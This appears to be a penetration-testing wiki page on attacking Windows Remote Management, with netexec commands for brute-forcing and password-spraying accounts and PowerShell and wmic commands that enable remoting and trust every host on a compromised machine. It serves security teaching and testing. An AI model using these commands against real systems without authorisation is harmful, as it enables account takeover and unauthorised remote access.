WinRM

Pentesting WinRM - TCP Ports 5985,5986

Theory

Windows Remote Management (WinRM) is a Microsoft protocol that allows remote management of Windows machines over HTTP(S) using SOAP. On the backend it's utilising WMI, so you can think of it as an HTTP based API for WMI. If WinRM is enabled on the machine, it's trivial to remotely administer the machine from PowerShell. In fact, you can just drop in to a remote PowerShell session on the machine (as if you were using SSH!) The easiest way to detect whether WinRM is available is by seeing if the port is opened. WinRM will listen on one of two ports: 5985/tcp (HTTP) or 5986/tcp (HTTPS)

Practice

Targeting Accounts

Be careful, brute-forcing winrm could block users.

netexec winrm <IP> -d <Domain Name> -u <userlist> -p <passwlist>

We can use following command to password spray

netexec winrm <IP> -d <Domain Name> -u <userlist> -p 'Passw0rd!'

Enable WinRM

Most Windows Server installations will have WinRM enabled by default, making it an attractive attack vector. However, for instances where this is not the case, we can enable it using powershell

If we have access to an elevated PowerShell prompt on the victim, we cam enable it and add any "attackers" as trusted hosts. We can run the following two commands

Enable-PSRemoting -Force
Set-Item wsman:\localhost\client\trustedhosts *

We can also activate WinRM remotely using wmic

wmic /node:<REMOTE_HOST> process call create "powershell enable-psremoting -force"

use the Test-WSMan function to test whether the target is configured for WinRM. You should see some information returned about the protocol version and wsmid:

#Check locally
Test-WSMan

#Check remotely
Test-WSMan -ComputerName <TARGET>

Execute Remote Commands

WinRM

Resources

5985,5986 - Pentesting WinRMHackTricks

Last updated 2 months ago